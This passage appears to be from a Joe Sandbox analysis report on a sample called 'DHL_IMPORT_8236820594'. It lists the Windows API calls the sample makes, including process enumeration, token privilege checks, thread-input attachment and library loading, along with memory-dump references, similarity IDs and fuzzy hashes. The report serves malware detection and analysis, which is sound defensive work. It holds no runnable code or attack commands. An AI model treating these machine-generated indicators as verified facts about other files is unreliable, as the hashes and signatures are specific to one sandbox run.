                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                          • String ID:
                                                                                          • API String ID: 2759813231-0
                                                                                          • Opcode ID: a49b271572b6eb234638484914ccbb416f1247ea2a8b89955266b83f8b108118
                                                                                          • Instruction ID: 2ec8603d83b1df80740cfe657f53067fc03a29d9d3203d2a2a3ef18babc24ca8
                                                                                          • Opcode Fuzzy Hash: a49b271572b6eb234638484914ccbb416f1247ea2a8b89955266b83f8b108118
                                                                                          • Instruction Fuzzy Hash: C0316371D00149AFCB00DFA9C885DAEBBF9FF48304B55806AE415E7312D7359E45CBA0
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0083D501
                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0083D50F
                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0083D52F
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0083D5DC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 420147892-0
                                                                                          APIs
                                                                                            • Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2
                                                                                          • GetCursorPos.USER32(?), ref: 00869001
                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00827711,?,?,?,?,?), ref: 00869016
                                                                                          • GetCursorPos.USER32(?), ref: 0086905E
                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00827711,?,?,?), ref: 00869094
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2864067406-0
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNEL32(?,0086CB68), ref: 0083D2FB
                                                                                          • GetLastError.KERNEL32 ref: 0083D30A
                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0083D319
                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0086CB68), ref: 0083D376
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 2267087916-0
                                                                                          APIs
                                                                                            • Part of subcall function 00831014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0083102A
                                                                                            • Part of subcall function 00831014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00831036
                                                                                            • Part of subcall function 00831014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00831045
                                                                                            • Part of subcall function 00831014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0083104C
                                                                                            • Part of subcall function 00831014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00831062
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008315BE
                                                                                          • _memcmp.LIBVCRUNTIME ref: 008315E1
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00831617
                                                                                          • HeapFree.KERNEL32(00000000), ref: 0083161E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                          • String ID:
                                                                                          • API String ID: 1592001646-0
                                                                                          APIs
                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0086280A
                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00862824
                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00862832
                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00862840
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                          • String ID:
                                                                                          • API String ID: 2169480361-0
                                                                                          APIs
                                                                                            • Part of subcall function 00838D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0083790A,?,000000FF,?,00838754,00000000,?,0000001C,?,?), ref: 00838D8C
                                                                                            • Part of subcall function 00838D7D: lstrcpyW.KERNEL32(00000000,?,?,0083790A,?,000000FF,?,00838754,00000000,?,0000001C,?,?,00000000), ref: 00838DB2
                                                                                            • Part of subcall function 00838D7D: lstrcmpiW.KERNEL32(00000000,?,0083790A,?,000000FF,?,00838754,00000000,?,0000001C,?,?), ref: 00838DE3
                                                                                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00838754,00000000,?,0000001C,?,?,00000000), ref: 00837923
                                                                                          • lstrcpyW.KERNEL32(00000000,?,?,00838754,00000000,?,0000001C,?,?,00000000), ref: 00837949
                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00838754,00000000,?,0000001C,?,?,00000000), ref: 00837984
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                          • String ID: cdecl
                                                                                          • API String ID: 4031866154-3896280584
                                                                                          APIs
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00867D0B
                                                                                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00867D2A
                                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00867D42
                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0084B7AD,00000000), ref: 00867D6B
                                                                                            • Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Long
                                                                                          • String ID:
                                                                                          • API String ID: 847901565-0
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 008656BB
                                                                                          • _wcslen.LIBCMT ref: 008656CD
                                                                                          • _wcslen.LIBCMT ref: 008656D8
                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00865816
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 455545452-0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00831A47
                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00831A59
                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00831A6F
                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00831A8A
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 0083E1FD
• MessageBoxW.USER32(?,?,?,?), ref: 0083E230
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0083E246
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0083E24D
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
APIs
• CreateThread.KERNEL32(00000000,?,007FCFF9,00000000,00000004,00000000), ref: 007FD218
• GetLastError.KERNEL32 ref: 007FD224
• __dosmaperr.LIBCMT ref: 007FD22B
• ResumeThread.KERNEL32(00000000), ref: 007FD249
Similarity
• API ID: Thread$CreateErrorLastResume__dosmaperr
• String ID:
• API String ID: 173952441-0
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 007D604C
• GetStockObject.GDI32(00000011), ref: 007D6060
• SendMessageW.USER32(00000000,00000030,00000000), ref: 007D606A
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 007F3B56
  • Part of subcall function 007F3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 007F3AD2
  • Part of subcall function 007F3AA3: ___AdjustPointer.LIBCMT ref: 007F3AED
• _UnwindNestedFrames.LIBCMT ref: 007F3B6B
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 007F3B7C
• CallCatchBlock.LIBVCRUNTIME ref: 007F3BA4
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• String ID:
• API String ID: 737400349-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007D13C6,00000000,00000000,?,0080301A,007D13C6,00000000,00000000,00000000,?,0080328B,00000006,FlsSetValue), ref: 008030A5
• GetLastError.KERNEL32(?,0080301A,007D13C6,00000000,00000000,00000000,?,0080328B,00000006,FlsSetValue,00872290,FlsSetValue,00000000,00000364,?,00802E46), ref: 008030B1
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0080301A,007D13C6,00000000,00000000,00000000,?,0080328B,00000006,FlsSetValue,00872290,FlsSetValue,00000000), ref: 008030BF
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0083747F
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00837497
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008374AC
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 008374CA
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0083ACD3,?,00008000), ref: 0083B0C4
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0083ACD3,?,00008000), ref: 0083B0E9
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0083ACD3,?,00008000), ref: 0083B0F3
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0083ACD3,?,00008000), ref: 0083B126
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00832DC5
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00832DD6
• GetCurrentThreadId.KERNEL32 ref: 00832DDD
• AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00832DE4
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
APIs
  • Part of subcall function 007E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007E9693
  • Part of subcall function 007E9639: SelectObject.GDI32(?,00000000), ref: 007E96A2
  • Part of subcall function 007E9639: BeginPath.GDI32(?), ref: 007E96B9
  • Part of subcall function 007E9639: SelectObject.GDI32(?,00000000), ref: 007E96E2
• MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00868887
• LineTo.GDI32(?,?,?), ref: 00868894
• EndPath.GDI32(?), ref: 008688A4
• StrokePath.GDI32(?), ref: 008688B2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                          • String ID:
                                                                                          • API String ID: 1539411459-0
                                                                                          • Opcode ID: 4cdd14234fbf8ae8020a3316147874b2018ea6e074f8619edd95772aecffe1fe
                                                                                          • Instruction ID: 550ab377f6be6abc314e7a68d54c9884139c2b60fe872c64f1d36b43c6f8fa39
                                                                                          • Opcode Fuzzy Hash: 4cdd14234fbf8ae8020a3316147874b2018ea6e074f8619edd95772aecffe1fe
                                                                                          • Instruction Fuzzy Hash: FBF05E36041658FAEB126F94AC0DFDE3F59BF0A310F458100FA51650E1C7B55511CFE6
                                                                                          APIs
                                                                                          • GetSysColor.USER32(00000008), ref: 007E98CC
                                                                                          • SetTextColor.GDI32(?,?), ref: 007E98D6
                                                                                          • SetBkMode.GDI32(?,00000001), ref: 007E98E9
                                                                                          • GetStockObject.GDI32(00000005), ref: 007E98F1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$ModeObjectStockText
                                                                                          • String ID:
                                                                                          • API String ID: 4037423528-0
                                                                                          • Opcode ID: 8c8689689ffd47efbbd7387e0e4bacc5a9f80d9879859652544928f110fddfa0
                                                                                          • Instruction ID: 28330a2e887e8002f0d53350d36840ca8fd3839cb726e8ebaa27448d89e571cb
                                                                                          • Opcode Fuzzy Hash: 8c8689689ffd47efbbd7387e0e4bacc5a9f80d9879859652544928f110fddfa0
                                                                                          • Instruction Fuzzy Hash: 49E06531244280AADB215B75BC09BE93F10FB12335F049219F7FA940E1C3B146909B11
                                                                                          APIs
                                                                                          • GetCurrentThread.KERNEL32 ref: 00831634
                                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,008311D9), ref: 0083163B
                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008311D9), ref: 00831648
                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,008311D9), ref: 0083164F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                                          • String ID:
                                                                                          • API String ID: 3974789173-0
                                                                                          • Opcode ID: a425c0f5fb413d50a3ffc3545dedf0f470c1642f74d87d7f0970919c48b50573
                                                                                          • Instruction ID: b04ce99bceaf17e644b35d0537c27a80a6481e34e57deca1e26f5c5807369d3f
                                                                                          • Opcode Fuzzy Hash: a425c0f5fb413d50a3ffc3545dedf0f470c1642f74d87d7f0970919c48b50573
                                                                                          • Instruction Fuzzy Hash: A4E08631601211EBDB201FE19E0DB663B7CFF54B91F154808F685C9080E6B44440C791
                                                                                          APIs
                                                                                          • GetDesktopWindow.USER32 ref: 0082D858
                                                                                          • GetDC.USER32(00000000), ref: 0082D862
                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0082D882
                                                                                          • ReleaseDC.USER32(?), ref: 0082D8A3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2889604237-0
                                                                                          • Opcode ID: 132bbd21652f75d7b17a97c768b3e2ccf2b38f44e63b8be09a2c0a41562a31dc
                                                                                          • Instruction ID: a8e9d1b1049e2d5af689cf9c72c37da41134e1138800d635e330d2074dd93301
                                                                                          • Opcode Fuzzy Hash: 132bbd21652f75d7b17a97c768b3e2ccf2b38f44e63b8be09a2c0a41562a31dc
                                                                                          • Instruction Fuzzy Hash: 3CE01AB5800205EFCB419FA0D90C67DBBB1FB18310F15A419E88AE7250CBB85941AF44
                                                                                          APIs
                                                                                          • GetDesktopWindow.USER32 ref: 0082D86C
                                                                                          • GetDC.USER32(00000000), ref: 0082D876
                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0082D882
                                                                                          • ReleaseDC.USER32(?), ref: 0082D8A3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2889604237-0
                                                                                          • Opcode ID: 6fc9d90746662ba32165cf07b6c12c4045833e7b57f879b4374ec81b0da75209
                                                                                          • Instruction ID: 8d0d26d0340bec5e49213b63a968d82e2e9ad013e9c90e12d5babcd265970d9f
                                                                                          • Opcode Fuzzy Hash: 6fc9d90746662ba32165cf07b6c12c4045833e7b57f879b4374ec81b0da75209
                                                                                          • Instruction Fuzzy Hash: 2EE012B1800200EFCB51AFA0D80C66DBBB1FB18310B15A009E88AE7250CBB85901AF44
                                                                                          APIs
                                                                                            • Part of subcall function 007D7620: _wcslen.LIBCMT ref: 007D7625
                                                                                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00844ED4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Connection_wcslen
                                                                                          • String ID: *$LPT
                                                                                          • API String ID: 1725874428-3443410124
                                                                                          • Opcode ID: 8bbe2883efcb73563a5711b6ef148e6edbc743e96c20e77d6bb4430996d2ad08
                                                                                          • Instruction ID: 1fbea1fc4de1de82dad58c2c4391e243b5f0601b1e677a426f84ac3e1e1858f8
                                                                                          • Opcode Fuzzy Hash: 8bbe2883efcb73563a5711b6ef148e6edbc743e96c20e77d6bb4430996d2ad08
